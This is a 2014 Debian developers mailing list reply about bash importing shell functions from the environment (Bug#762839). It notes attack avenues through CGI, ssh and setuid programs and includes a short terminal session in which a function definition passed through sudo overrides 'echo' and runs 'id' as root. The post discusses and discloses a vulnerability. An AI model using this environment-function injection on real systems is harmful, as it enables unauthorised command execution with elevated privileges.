Re: Bug#762839: bash without importing shell functions from the environment

To: debian developers <debian-devel@lists.debian.org>
Subject: Re: Bug#762839: bash without importing shell functions from the environment
From: Brian May <brian@microcomaustralia.com.au>
Date: Fri, 26 Sep 2014 11:40:00 +1000
Message-id: <[🔎] CAA0ZO6D4EeQkCSnPuJq0phT_5i=kByqMpBU2v8DGhUHEsnF6PA@mail.gmail.com>
In-reply-to: <[🔎] 87oau3mdkv.fsf@vostro.rath.org>
References: <[🔎] 21540.13505.438186.122045@chiark.greenend.org.uk> <[🔎] 20140925162026.GA11755@type.bordeaux.inria.fr> <[🔎] 20140925191758.GA6306@smurf.noris.de> <[🔎] 20140925203900.GT3550@type.youpi.perso.aquilenet.fr> <[🔎] 87oau3mdkv.fsf@vostro.rath.org>

On 26 September 2014 10:26, Nikolaus Rath <Nikolaus@rath.org> wrote:

Wasn't there some web server that used to put query script variables
into the environment of the CGI script? Or am I confusing that with
PHP's evil register_globals?

CGI is just one avenue for attack.

There are other avenues. e.g. the ssh one, if I understand correctly, would allow setting any environment variable to any value.

See list of packages here:

https://access.redhat.com/articles/1200223

In addition, if there are any setuid/setgid program, either in Debian or installed locally, that make external calls to bash, these would be vulnerable.

I thought sudo was suppose to be ok, sure doesn't look ok to me.

brian@aquitard:~$ sudo echo='() { /bin/echo bar; }' bash

root@aquitard:/home/brian# echo hello

bar

brian@aquitard:~$ sudo echo='() { /bin/echo bar; }' ./test.sh

bar

brian@aquitard:~$ sudo echo='() { /bin/echo bar; id; }' ./test.sh

bar

uid=0(root) gid=0(root) groups=0(root)

--

Brian May <brian@microcomaustralia.com.au>

Reply to:

Follow-Ups:
- Re: Bug#762839: bash without importing shell functions from the environment
  - From: Russ Allbery <rra@debian.org>
- Re: Bug#762839: bash without importing shell functions from the environment
  - From: Samuel Thibault <sthibault@debian.org>

References:
- bash without importing shell functions from the environment
  - From: Ian Jackson <ijackson@chiark.greenend.org.uk>
- Re: Bug#762839: bash without importing shell functions from the environment
  - From: Samuel Thibault <sthibault@debian.org>
- Re: Bug#762839: bash without importing shell functions from the environment
  - From: Matthias Urlichs <matthias@urlichs.de>
- Re: Bug#762839: bash without importing shell functions from the environment
  - From: Samuel Thibault <sthibault@debian.org>
- Re: Bug#762839: bash without importing shell functions from the environment
  - From: Nikolaus Rath <Nikolaus@rath.org>

Prev by Date: Re: Bug#762839: bash without importing shell functions from the environment
Next by Date: Fwd: bash without importing shell functions from the environment
Previous by thread: Re: Bug#762839: bash without importing shell functions from the environment
Next by thread: Re: Bug#762839: bash without importing shell functions from the environment
Index(es):
- Date
- Thread